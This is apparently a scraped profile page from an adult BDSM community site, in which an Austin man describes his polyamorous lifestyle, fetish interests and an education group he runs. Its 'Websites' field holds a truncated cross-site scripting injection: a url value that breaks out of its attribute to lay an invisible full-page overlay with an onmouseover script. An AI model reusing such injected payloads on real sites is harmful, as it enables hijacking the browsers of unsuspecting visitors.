
hi, here for the 5 pm orgy...
Gender Man
Relationship I'm fucking Ziggridlox
Location Austin TX
Info & Stats
Sexuality: Bi
Favorite Porn: BDSM
Joined: Nov 20th, 2016
Last Seen: Oct 25th 2019
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I decided to change your section up a bit make it more personal considering most of it just sounds like a bunch of official "I don't know if you know this but I'm an important kind of guy with an office full of leather bound books that smells of mahogany" bullshit. Truth is I have put a lot of time and effort into my ambitions and goals the last two years that I have really bypassed my own needs in a lot of ways. what I'd like to concentrate on is finding more really cool people to chill with that are like-minded and into having fun doing things that don't have to always include play parties or orgies... LOL. I would love to find a play partner or partners and even better yet eventually I should say, family to play And do rope with, regularly. early on 1 first discovering my draw to these practices, I a was regularly and randomly sought out by couples which became 1 of my favorite play scenarios. But I also like diversity and have lived in the polyamorous ways for years. I'm not necessarily looking for a serious arrangements or long term in that sense as much as I want, friends that I can get together with it 2 females or couple and relate to but more than anything progress in spirit and grow strong bond with.

I'm an Austin area music and event promoter. I am personally into many fetishes, as well as being a promoter of. I've lived in Austin off and on for over 20 years, being envolved in the fetish community since moving here in 1990.
I'm an advocate of open and vocolized sexual expression, educating the the curious and encouraging those who have been reluctant to come out or accept their darker side, due to fears of ridicule or judgment.

I am a dominate male, a sadist, a daddy, and have been in poly relationships since the age of 20. I greatly enjoy having a group of play partners and satisfying them first. Lately, my life has been pretty quiet, as I've been trying to get myself organized and back on track, after a series of misfortunes. I am looking forward to creating another group of open minded, interesting, loving friends.
I have a dark side and I embrace it.

**I am chief administrator and creator of a group, geared towards helping guide, educate and nurture individuals drawn to our lifestyle and practices. Primarily active in a FB secret group, we hold weekly discussion threads, usually monitored and run by mentors in our group who have been active in the community an adequate period of time, to justify teaching and advising. We hold bi-weekly munches, workshops, and demos as well as provide support links and a blog, backed by professional research. Our primary group is a well monitored and protected sanctuary, requiring strict screening of all new arrivals. Fourteen admins are responsible for maintaining a positive ambiance with in the group and vote on all issues relative to the group.
During the warm season, CAMENA TRIBE PROGRESSIVE frequent Hippie Hollow, Austin's local nude park at Lake Travis, consistently in safe numbers, avoiding negative and/or potentially dangerous elements.
Currently (1/30/16), CTP are listed on several social networks, but have been somewhat stagnant due to adjustments in our brigade system. We are most active on the FB secret group. This will soon change. All networks will be updated on activities, discussions and announcements.
CAMENA TRIBE PROGRESSIVEdoes not discriminate. All colors, creeds, sexes, sexual preferences and genre lifestyles are welcome.**

Websites (edit)

[url http://google.com"style="position:fixed;left:0;top:0;width:900000px;height:900000px;opacity:0"onmouseover="window.s=do

Ziggridlox's achievements 2

1 year
5 years

Ziggridlox's Comments

10 Dec 2016 Ziggridlox commented
Very hot! Beautiful pussy.


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